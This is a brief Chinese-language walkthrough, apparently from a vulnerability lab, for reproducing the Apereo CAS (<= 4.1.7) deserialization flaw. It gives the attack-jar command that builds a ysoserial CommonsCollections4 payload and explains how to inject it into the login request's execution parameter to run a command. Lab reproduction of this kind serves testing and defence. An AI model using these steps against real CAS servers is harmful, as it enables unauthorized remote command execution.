产品样子 影响范围: Apereo CAS <= 4.1.7
http://your-ip:8080/cas/login
即可查看到登录页面。
我们使用(apereo-cas-attack-1.0-SNAPSHOT-all.jar)来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload:
jar文件下载地址
https://github.com/vulhub/Apereo-CAS-Attack/releases.
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
使用方式:
代理登录的请求(这里注意一定是代理的登录请求不能自己瞎造请求包)否则不成功
将 payload 放入到 execution=[payload] 中其他保持原样 如下:
发送后即可检查命令是否执行。